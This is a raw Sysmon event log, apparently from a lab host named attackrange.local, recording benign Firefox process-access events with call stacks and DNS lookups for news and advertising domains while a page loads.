Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.012{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program 
Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.012{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla 
Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:42.221{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 
10341000x800000000000000017886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:42.221{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:42.221{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla 
Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.552{59A5CD1D-945A-6005-3305-00000000A301}7052d2p3zdq8vjvnxd.cloudfront.net013.225.84.215;13.225.84.75;13.225.84.164;13.225.84.210;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.551{59A5CD1D-945A-6005-3305-00000000A301}7052d2p3zdq8vjvnxd.cloudfront.net0::ffff:13.225.84.210;::ffff:13.225.84.215;::ffff:13.225.84.75;::ffff:13.225.84.164;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.423{59A5CD1D-945A-6005-3305-00000000A301}7052de.ioam.de9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.422{59A5CD1D-945A-6005-3305-00000000A301}7052de.ioam.de091.215.103.65;91.215.100.40;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.421{59A5CD1D-945A-6005-3305-00000000A301}7052de.ioam.de0::ffff:91.215.100.40;::ffff:91.215.103.65;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.368{59A5CD1D-8E56-6005-2E00-00000000A301}246416.94.204.143.in-addr.arpa.0type: 12 server-143-204-94-16.fra50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.368{59A5CD1D-8E56-6005-2E00-00000000A301}2464117.76.237.15.in-addr.arpa.0type: 12 ec2-15-237-76-117.eu-west-3.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.289{59A5CD1D-945A-6005-3305-00000000A301}7052status.thawte.com0type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.267{59A5CD1D-945A-6005-3305-00000000A301}7052script.ioam.de9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.265{59A5CD1D-945A-6005-3305-00000000A301}7052script.ioam.de091.215.103.64;91.215.100.39;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.264{59A5CD1D-945A-6005-3305-00000000A301}7052script.ioam.de0::ffff:91.215.100.39;::ffff:91.215.103.64;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:41.197{59A5CD1D-945A-6005-3305-00000000A301}7052cdn.privacy-mgmt.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.186{59A5CD1D-945A-6005-3305-00000000A301}7052cdn.privacy-mgmt.com0143.204.94.64;143.204.94.67;143.204.94.107;143.204.94.16;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.186{59A5CD1D-945A-6005-3305-00000000A301}7052cdn.privacy-mgmt.com0::ffff:143.204.94.16;::ffff:143.204.94.64;::ffff:143.204.94.67;::ffff:143.204.94.107;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.158{59A5CD1D-945A-6005-3305-00000000A301}7052spiegel.de.ssl.sc.omtrdc.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.146{59A5CD1D-945A-6005-3305-00000000A301}7052spiegel.de.ssl.sc.omtrdc.net015.237.136.106;35.181.18.61;15.237.76.117;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.145{59A5CD1D-945A-6005-3305-00000000A301}7052sams.spiegel.de0type: 5 spiegel.de.ssl.sc.omtrdc.net;::ffff:15.237.76.117;::ffff:15.237.136.106;::ffff:35.181.18.61;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.878{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program 
Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.878{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla 
Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.878{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 
10341000x800000000000000017919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.846{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.846{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla 
Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.800{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla 
Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.800{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.800{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.675{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-948C-6005-3F05-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
